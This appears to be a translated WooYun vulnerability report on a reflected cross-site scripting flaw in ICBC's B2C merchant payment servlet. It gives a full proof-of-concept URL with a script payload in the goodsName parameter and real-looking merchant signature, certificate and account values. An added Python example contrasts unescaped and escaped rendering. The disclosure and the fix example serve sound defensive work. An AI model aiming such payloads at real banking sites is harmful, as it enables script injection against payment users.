
Vulnerability summary

Defect ID: wooyun-2010-0888

Title: XSS weakness in the ICBC B2C merchant payment interface

Vendor: Industrial and Commercial Bank of China (ICBC)

Author: Liscker

Submitted: 2010-11-30 10:48

Fixed: 2010-11-30 11:04

Disclosed: 2010-11-30 11:04

Vulnerability type: XSS (cross-site scripting)

Severity: Low

Self-assessed rank: 5

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2010-11-30: actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2010-11-30: the vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

The ICBC B2C merchant payment interface has an XSS weakness.

Details:

The goodsName parameter of the payment request is reflected into the page without encoding, which allows cross-site scripting.
Note that when submitting the payment form, the time fields (orderDate) must fall within the valid time window, otherwise the request is rejected before the reflection occurs.

Proof of concept:

https://b2c.icbc.com.cn:443/servlet/ICBCINBSEBusinessServlet?merSignMsg=UwETHemn%2BZGtDXH1Shr1AhsuLznAGP6ze6%2F77rH4aKxtKezJ0PB1zEZrUXnD0wfrfQYPpOhJt7rQD6kb647jhNZgTYzXQTXcfAlhotA0w2ZSU5rS74%2B0iEqRiDmVxi49oyAh7OdEdkxCRbf8S6omNUyc89ZfRONrQubahnPZn3A%3D&merCert=MIICdDCCAd2gAwIBAgIKYULKEHrkACKn7jANBgkqhkiG9w0BAQUFADAnMQ8wDQYDVQQDEwZJY2JjQ0ExFDASBgNVBAoTC2ljYmMuY29tLmNuMB4XDTA5MTAxMDA2MjkzOFoXDTEwMTAxMDA2MjkzOFowPzEYMBYGA1UEAxMPeWVlcGF5MDEuZS40MDAwMQ0wCwYDVQQLEwQ0MDAwMRQwEgYDVQQKEwtpY2JjLmNvbS5jbjCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAvZa1tzLFf%2FRM9zSdy8nBoBNG0RI92Zdh0vplLlhPKiNwXFFtGuI0FGF9yD5CBZ6z2aH5piKQ15g%2F6vXmq4RoOsQAybA0e2FkE%2FHqYuDXZAlWgbKTKRFK9zW%2FR0OTxOQF2OSQIvaf1Q%2BYsoB%2BqqigzaHa5xdHhWPGLwvCooYskKsCAwEAAaOBjjCBizAfBgNVHSMEGDAWgBSnYiqG%2BrfWgZuFTNlkSGERswvHmjBJBgNVHR8EQjBAMD6gPKA6pDgwNjEQMA4GA1UEAxMHY3JsMjI3MjEMMAoGA1UECxMDY3JsMRQwEgYDVQQKEwtpY2JjLmNvbS5jbjAdBgNVHQ4EFgQUYDHjjT5kEx5CGbr34mwt7tubemowDQYJKoZIhvcNAQEFBQADgYEAhSHwxlCt3AYzO8O90bEHyPWtbucVOv%2FjTxKxFpaldRc20lkctKSOjSXpiy0%2FKTX4aJ7XC1QZO0pRTPjVxmlm%2BH64ZEFK23%2BgZQYX5EFKHJ8n6pMsVo%2Fg2YNRRm6lQtTqIU2dM1D9jV3Pxh5HmGtOwbXXKYTwE5GhPvaUI0x8xr8%3D&remark1=0&remark2=0&interfaceName=ICBC_PERBANK_B2C&interfaceVersion=1.0.0.0&orderid=352999184&amount=1232300&curType=001&merID=4000EC23359695&merAcct=4000021129200895575&verifyJoinFlag=0&notifyType=HS&merURL=http%3A%2F%2Fbank.test.com&resultType=0&orderDate=20100921153305&goodsName=%3Cscript%3Ealert%28/1980/%29%3C/script%3E

Fix:

Filter the parameter (reject tag syntax on input and entity-encode the value on output).

Copyright notice: please credit the source when reproducing, Liscker@WooYun
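The report does not show the servlet's rendering code, so the following is an added illustration (not ICBC's code) of the two halves of the fix: the vulnerable reflection of goodsName beside its entity-encoded form, plus an input filter that rejects tag syntax. The decoded goodsName is the one from the proof-of-concept URL; the shortened URL and other parameter values are constructed for the example.

```python
from html import escape
from urllib.parse import parse_qs, urlsplit

# Constructed for this example: only a few parameters of the real proof-of-concept
# URL are reproduced; the signature, certificate and merchant fields are left out.
POC_URL = (
    "https://b2c.icbc.com.cn:443/servlet/ICBCINBSEBusinessServlet"
    "?orderid=352999184&amount=1232300&orderDate=20100921153305"
    "&goodsName=%3Cscript%3Ealert%28/1980/%29%3C/script%3E"
)


def goods_name_from(url: str) -> str:
    """Extract goodsName as the servlet sees it (URL-decoded)."""
    return parse_qs(urlsplit(url).query).get("goodsName", [""])[0]


def render_unsafe(goods_name: str) -> str:
    """Vulnerable pattern: the parameter is concatenated straight into the page."""
    return "<td>Goods: " + goods_name + "</td>"


def render_safe(goods_name: str) -> str:
    """Fixed pattern: entity-encode the value for the HTML text context it lands in."""
    return "<td>Goods: " + escape(goods_name, quote=True) + "</td>"


def is_plausible_goods_name(goods_name: str) -> bool:
    """Input-side filter: a product name has no legitimate need for tag characters.

    The length bound (100) is an assumed limit, not one taken from the interface spec.
    """
    return 0 < len(goods_name) <= 100 and "<" not in goods_name and ">" not in goods_name


def reflects_script_tag(html: str) -> bool:
    """Check a rendered fragment for the raw script tag from the proof of concept."""
    return "<script" in html.lower()


if __name__ == "__main__":
    name = goods_name_from(POC_URL)
    print("decoded goodsName:", name)
    print("unsafe render    :", render_unsafe(name))
    print("safe render      :", render_safe(name))
    print("passes input filter:", is_plausible_goods_name(name))
```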


Vulnerability response

Vendor response:

Vendor could not be contacted, or vendor actively declined the report

Vulnerability rank: 8 (WooYun rating)

